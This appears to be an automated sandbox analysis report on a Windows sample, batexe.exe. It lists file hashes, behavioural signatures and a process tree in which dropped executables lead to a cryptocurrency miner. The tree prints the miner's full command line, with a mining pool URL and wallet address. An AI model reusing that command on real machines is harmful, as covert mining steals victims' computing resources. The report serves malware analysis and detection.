Analysis
-
max time kernel
293s -
max time network
298s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-ja -
resource tags
arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
19-02-2024 20:58
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240214-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 4780 b2e.exe 4400 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 4400 cpuminer-sse2.exe 4400 cpuminer-sse2.exe 4400 cpuminer-sse2.exe 4400 cpuminer-sse2.exe 4400 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/4704-9-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 4704 wrote to memory of 4780 4704 batexe.exe 85 PID 4704 wrote to memory of 4780 4704 batexe.exe 85 PID 4704 wrote to memory of 4780 4704 batexe.exe 85 PID 4780 wrote to memory of 4784 4780 b2e.exe 86 PID 4780 wrote to memory of 4784 4780 b2e.exe 86 PID 4780 wrote to memory of 4784 4780 b2e.exe 86 PID 4784 wrote to memory of 4400 4784 cmd.exe 89 PID 4784 wrote to memory of 4400 4784 cmd.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4704 -
C:\Users\Admin\AppData\Local\Temp\6C37.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\6C37.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\6C37.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4780 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6EC7.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:4784 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4400
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
11.4MB
MD57d1c574b726ff9c2da598368f8e0fb73
SHA14cd13fa777ae3ceaddf39da843ff1daf02657836
SHA256b6c2694f6b154511b810fb8dcc3cbcdb80907fba0230298c5e767dc59fb21731
SHA512d1ec6e0998bdda1c680348ae460e2f4f7b8b675f2815c43979e1e040636800a7aa951354486357e18e53457c9a5b8f1d7dc74e6fc2e1e85186bb5b4b3fd5a430
-
Filesize
5.1MB
MD59ce02384cdcfa25c9469cbed1dc4ab70
SHA1371a4ac53f4c935314618418aff787b3213d5956
SHA25653f9f87e1db378e9f11cc7ce596cc4f60c543af0bfe7ab5b0b2c95b9a48f3ca5
SHA51229ebf6dbbfbae2ad9e9ba96f383076a60283b9f0f526e0babed9a9817151b0f18b5b6a8b734d34acd4c10eae8c98a16ad530043401102f6a34ec725c742c5fb2
-
Filesize
4.7MB
MD5271ec26d1533accefe26c119f2f6a0ae
SHA117a6dd6a34432f2e073454c72aea4e87088aa054
SHA2564845f15b3c51326aed0e9eeb0c34ee0f1bd6f68957d6978ffe9436e1ea00362c
SHA51292c6d2f9ad9021e5b760be7df64db96bc5aa3380878d0ffeef93f98c5d47bb6527cf859636525bebe6f05870a1349173b2eb9d51c28fb37732cd1286bee00c8f
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
2.3MB
MD54c04147c386ba8792ac6a03069572a8a
SHA1dda67789fc1d0f2469ca95f01a5c81034853ca6a
SHA256c7739a1e940a282703d06eccda7110426d306f390e97fdbbd9df18472fd132cd
SHA512a8b5a0b878a9a7d30cb38feff814e1f4dce24d000158edc10a43ee9a89920bedf7adc92eb7e3913098b6aab7fbd0531f56fc09f508b5c2769992a94e55d153db
-
Filesize
2.2MB
MD5633c84d523160a0e19f728fa33f1188c
SHA1324bbe6b1e9563f5b4e7a38e77b2506bf0aa330c
SHA25645ea2fa7fd421f8a2795c273afb6ea91eaea4c380e050b1fa88779c269156274
SHA512c6a314aed3c0ac4e28d6e9b57ccf68547eeee4a1afa5f3d8fdf6eef6772b71c506d6dd1835296788e416fbc84150b34573777347e8d0f1cfa34efe06d60a2813
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
1.2MB
MD57cf672bee2afba2dcd0c031ff985958e
SHA16b82a205db080ffdcb4a4470fce85a14413f3217
SHA256c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05
SHA5123e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5
-
Filesize
3.5MB
MD5e1a9f799617e1c4fbcc1da00d9d0c5df
SHA1f7457ec49d4f62a72468a358d07db4640a85335b
SHA25685c86fd4e2a0abaa8134a71e8319401210244e0c23c93d2ded21c1255a587d03
SHA51278e72cbdebee5c3039aa1676a18668fefee7ef4d5d2ed5e6d10298498971f6088ed187e7285bb36e4d86fa197f7a16f5c16ea3b561138b07e884c70989712492
-
Filesize
2.9MB
MD5725c46ce2100acb09ab9657a114c73d0
SHA11b22c21c11f8f00a1a6589d3b67545ada3f57685
SHA256e4547c5a05caa1d9349dbf25406aaf1097d9ad44710fa38235f5ec2a88cde2cc
SHA5125355d904031a46e576e71e631245372104d19ccf4ce2087698595a01d7a4768a360ba6bd8c40eac2d5032e4a4868fb994ab3f2f5fad9cbeea7c706c88f7ef750
-
Filesize
3.0MB
MD5e1f6eb705d9521144c034eac16db4cb8
SHA152356ae2b8f6cf4a7ec5dd48993ef033b7ab6fe5
SHA25683ef08cec229f8dbbe649542c24280835dcdfccfa63a44879908d0eb502210d6
SHA512294e8a942135c04f80ab3c583f3afec262e2392e054773b13a06e4be184eed8070f9b2513e8990df9627bfacb15e291092e9fbe510e3c8ae91611a0dc1e76496
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770